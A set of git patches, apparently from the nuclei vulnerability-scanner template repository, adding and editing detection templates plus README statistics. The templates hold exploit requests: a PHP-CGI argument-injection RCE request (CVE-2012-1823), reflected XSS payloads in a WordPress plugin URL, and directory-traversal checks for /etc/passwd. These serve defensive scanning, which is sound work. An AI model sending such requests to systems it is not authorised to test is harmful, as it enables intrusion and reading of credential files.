1 file changed, 35 insertions(+)
create mode 100644 cves/2012/CVE-2012-1823.yaml
diff --git a/cves/2012/CVE-2012-1823.yaml b/cves/2012/CVE-2012-1823.yaml
new file mode 100644
index 0000000000..1d71ce7da7
--- /dev/null
+++ b/cves/2012/CVE-2012-1823.yaml
@@ -0,0 +1,35 @@
+id: CVE-2012-1823
+
+info:
+ name: PHP CGI v5.3.12/5.4.2 RCE
+ author: pikpikcu
+ severity: critical
+ reference: |
+ - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823
+ - https://nvd.nist.gov/vuln/detail/CVE-2012-1823
+ description: |
+ sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.
+ tags: rce,php,cve,cve2012
+
+requests:
+ - raw:
+ - |
+ POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 31
+
+
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+ condition: and
+
+ - type: status
+ status:
+ - 200
From 8f8105bb99a62c717938262f56781798dab4a668 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Tue, 20 Jul 2021 16:00:00 +0530
Subject: [PATCH 140/149] Update CVE-2021-23241.yaml
---
cves/2021/CVE-2021-23241.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-23241.yaml b/cves/2021/CVE-2021-23241.yaml
index e65d7120b2..7924ec3b46 100644
--- a/cves/2021/CVE-2021-23241.yaml
+++ b/cves/2021/CVE-2021-23241.yaml
@@ -8,7 +8,6 @@ info:
reference: |
- https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-23241
-reference:
tags: cve,cve2021,iot,lfi,router
requests:
@@ -22,6 +21,7 @@ requests:
regex:
- "root:[0*]:0:0"
part: body
+
- type: status
status:
- 200
From b86a6ba59cdd6b1817636e32bac9f340d887921d Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 20 Jul 2021 17:14:12 +0530
Subject: [PATCH 141/149] Update vnc-detect.yaml
---
network/vnc-detect.yaml | 7 ++++++-
1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/network/vnc-detect.yaml b/network/vnc-detect.yaml
index 36e376c81c..7a0687aefd 100644
--- a/network/vnc-detect.yaml
+++ b/network/vnc-detect.yaml
@@ -13,4 +13,9 @@ network:
matchers:
- type: word
words:
- - "RFB"
\ No newline at end of file
+ - "RFB"
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - "RFB ([0-9.]+)"
From f2c22f66b64452b4fde12acfec52bf9201d8dba5 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 20 Jul 2021 17:28:29 +0530
Subject: [PATCH 142/149] Update CVE-2018-3760.yaml
---
cves/2018/CVE-2018-3760.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/cves/2018/CVE-2018-3760.yaml b/cves/2018/CVE-2018-3760.yaml
index 26e04286ed..ff39f6696f 100644
--- a/cves/2018/CVE-2018-3760.yaml
+++ b/cves/2018/CVE-2018-3760.yaml
@@ -35,6 +35,7 @@ requests:
regex:
- "/etc/passwd is no longer under a load path: (.*?),"
+ matchers-condition: and
matchers:
- type: regex
regex:
From a071981beeffbbf14597a14bf8ce1ddadaf22e7c Mon Sep 17 00:00:00 2001
From: sandeep
Date: Tue, 20 Jul 2021 18:33:13 +0530
Subject: [PATCH 143/149] readme update
---
.github/scripts/README.tmpl | 20 ++++++++------------
.github/scripts/update-readme.py | 2 +-
2 files changed, 9 insertions(+), 13 deletions(-)
diff --git a/.github/scripts/README.tmpl b/.github/scripts/README.tmpl
index 6c65868500..5f0f630645 100644
--- a/.github/scripts/README.tmpl
+++ b/.github/scripts/README.tmpl
@@ -32,19 +32,19 @@ We hope that you also contribute by sending templates via **pull requests** or [
## Nuclei Templates overview
-An overview of the nuclei template directory including number of templates associated with each directory.
+An overview of the nuclei template project, including statistics on unique tags, author, directory, severity, and type of templates. The table below contains the top ten statistics for each matrix; an expanded version of this is [available here](TEMPLATES-STATS.md), and also available in [JSON](TEMPLATES-STATS.json) format for integration.
-| Templates | Counts | Templates | Counts | Templates | Counts |
-| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
-| cves | {countTpl("cves/*")} | vulnerabilities | {countTpl("vulnerabilities/*")} | exposed-panels | {countTpl("exposed-panels")} |
-| takeovers | {countTpl("takeovers")} | exposures | {countTpl("exposures/*")} | technologies | {countTpl("technologies")} |
-| misconfiguration | {countTpl("misconfiguration")} | workflows | {countTpl("workflows")} | miscellaneous | {countTpl("miscellaneous")} |
-| default-logins | {countTpl("default-logins/*")} | file | {countTpl("file/*")} | dns | {countTpl("dns")} |
-| fuzzing | {countTpl("fuzzing")} | helpers | {countTpl("helpers/*")} | iot | {countTpl("iot")} |
+## Nuclei Templates Top 10 statistics
+
+
+
+
+
+{get_top10()}
**{command("tree", -2, None)}**.
@@ -52,10 +52,6 @@ An overview of the nuclei template directory including number of templates assoc
|
-
-{get_top10()}
-
-
📖 Documentation
-----
diff --git a/.github/scripts/update-readme.py b/.github/scripts/update-readme.py
index 814459587f..d585617477 100644
--- a/.github/scripts/update-readme.py
+++ b/.github/scripts/update-readme.py
@@ -9,7 +9,7 @@ def command(args, start=None, end=None):
return "\n".join(subprocess.run(args, text=True, capture_output=True).stdout.split("\n")[start:end])[:-1]
def get_top10():
- HEADER = "## Top 10 Contributors\n\n"
+ HEADER = "## Nuclei Templates Top 10 statistics\n\n"
TOP10 = command(["cat", "TOP-10.md"])
return HEADER + TOP10 if len(TOP10) > 0 else ""
From 9b1a9aaf25b7adc247cf41b53b221effdcbc95d3 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Tue, 20 Jul 2021 13:03:55 +0000
Subject: [PATCH 144/149] Auto Update README [Tue Jul 20 13:03:55 UTC 2021]
:robot:
---
README.md | 26 +++++++++++---------------
1 file changed, 11 insertions(+), 15 deletions(-)
diff --git a/README.md b/README.md
index 6d946b7ac1..7a9a0a09d3 100644
--- a/README.md
+++ b/README.md
@@ -32,28 +32,19 @@ We hope that you also contribute by sending templates via **pull requests** or [
## Nuclei Templates overview
-An overview of the nuclei template directory including number of templates associated with each directory.
+An overview of the nuclei template project, including statistics on unique tags, author, directory, severity, and type of templates. The table below contains the top ten statistics for each matrix; an expanded version of this is [available here](TEMPLATES-STATS.md), and also available in [JSON](TEMPLATES-STATS.json) format for integration.
-| Templates | Counts | Templates | Counts | Templates | Counts |
-| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
-| cves | 475 | vulnerabilities | 229 | exposed-panels | 202 |
-| takeovers | 70 | exposures | 116 | technologies | 125 |
-| misconfiguration | 77 | workflows | 33 | miscellaneous | 27 |
-| default-logins | 44 | file | 42 | dns | 10 |
-| fuzzing | 10 | helpers | 9 | iot | 18 |
+## Nuclei Templates Top 10 statistics
-**134 directories, 1609 files**.
+
-
-
-## Top 10 Contributors
+## Nuclei Templates Top 10 statistics
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
@@ -68,6 +59,11 @@ An overview of the nuclei template directory including number of templates assoc
| wp-plugin | 110 | gaurang | 42 | file | 42 | | | | |
| cve2019 | 82 | gy741 | 36 | workflows | 33 | | | | |
+**134 directories, 1612 files**.
+
+ |
+
+
📖 Documentation
-----
From 76259204a7cc5aa2e0ecc33068d71c2dffa747a3 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Tue, 20 Jul 2021 18:35:07 +0530
Subject: [PATCH 145/149] Update README.tmpl
---
.github/scripts/README.tmpl | 6 ------
1 file changed, 6 deletions(-)
diff --git a/.github/scripts/README.tmpl b/.github/scripts/README.tmpl
index 5f0f630645..0379c746d5 100644
--- a/.github/scripts/README.tmpl
+++ b/.github/scripts/README.tmpl
@@ -38,12 +38,6 @@ An overview of the nuclei template project, including statistics on unique tags,
-## Nuclei Templates Top 10 statistics
-
-
-
-
-
{get_top10()}
**{command("tree", -2, None)}**.
From 9c67ac6b4e2c3cb3477511415c74c5a0456ec171 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Tue, 20 Jul 2021 13:05:45 +0000
Subject: [PATCH 146/149] Auto Update README [Tue Jul 20 13:05:45 UTC 2021]
:robot:
---
README.md | 6 ------
1 file changed, 6 deletions(-)
diff --git a/README.md b/README.md
index 7a9a0a09d3..1c9fb3a946 100644
--- a/README.md
+++ b/README.md
@@ -40,12 +40,6 @@ An overview of the nuclei template project, including statistics on unique tags,
## Nuclei Templates Top 10 statistics
-
-
-
-
-## Nuclei Templates Top 10 statistics
-
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 467 | dhiyaneshdk | 202 | cves | 473 | info | 453 | http | 1409 |
From 1b8ebe74b66c8070fed970ed7ae3c88a3bbad7bd Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 20 Jul 2021 19:47:19 +0530
Subject: [PATCH 147/149] Update CVE-2016-1000127.yaml
---
cves/2016/CVE-2016-1000127.yaml | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/cves/2016/CVE-2016-1000127.yaml b/cves/2016/CVE-2016-1000127.yaml
index 9539d37287..459e6c5829 100644
--- a/cves/2016/CVE-2016-1000127.yaml
+++ b/cves/2016/CVE-2016-1000127.yaml
@@ -4,19 +4,20 @@ info:
name: AJAX Random Post <= 2.00 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
+ description: Reflected XSS in wordpress plugin ajax-random-post v2.00
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- - "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
+ - "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
From c38ada9a7133aa054f45faeaea63253c04a6db79 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 20 Jul 2021 19:50:02 +0530
Subject: [PATCH 148/149] Update CVE-2010-4231.yaml
---
cves/2010/CVE-2010-4231.yaml | 5 ++++-
1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/cves/2010/CVE-2010-4231.yaml b/cves/2010/CVE-2010-4231.yaml
index fc754ae86b..0a0c3a1ac7 100644
--- a/cves/2010/CVE-2010-4231.yaml
+++ b/cves/2010/CVE-2010-4231.yaml
@@ -4,7 +4,10 @@ info:
name: Camtron CMNC-200 IP Camera - Directory Traversal
author: daffainfo
severity: high
- reference: https://www.exploit-db.com/exploits/15505
+ description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
+ reference: |
+ - https://nvd.nist.gov/vuln/detail/CVE-2010-4231
+ - https://www.exploit-db.com/exploits/15505
tags: cve,cve2010,iot,lfi
requests:
From d1eca2b59ecf86fd806e4c09d0ab78ece85f23ca Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 20 Jul 2021 19:54:23 +0530
Subject: [PATCH 149/149] Update CVE-2010-2307.yaml
---
cves/2010/CVE-2010-2307.yaml | 5 ++++-
1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/cves/2010/CVE-2010-2307.yaml b/cves/2010/CVE-2010-2307.yaml
index e841195a11..22129fc120 100644
--- a/cves/2010/CVE-2010-2307.yaml
+++ b/cves/2010/CVE-2010-2307.yaml
@@ -4,7 +4,10 @@ info:
name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal
author: daffainfo
severity: high
- reference: https://www.securityfocus.com/bid/40550/info
+ description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
+ reference: |
+ - https://www.securityfocus.com/bid/40550/info
+ - https://nvd.nist.gov/vuln/detail/CVE-2010-2307
tags: cve,cve2010,iot,lfi
requests:
| | | |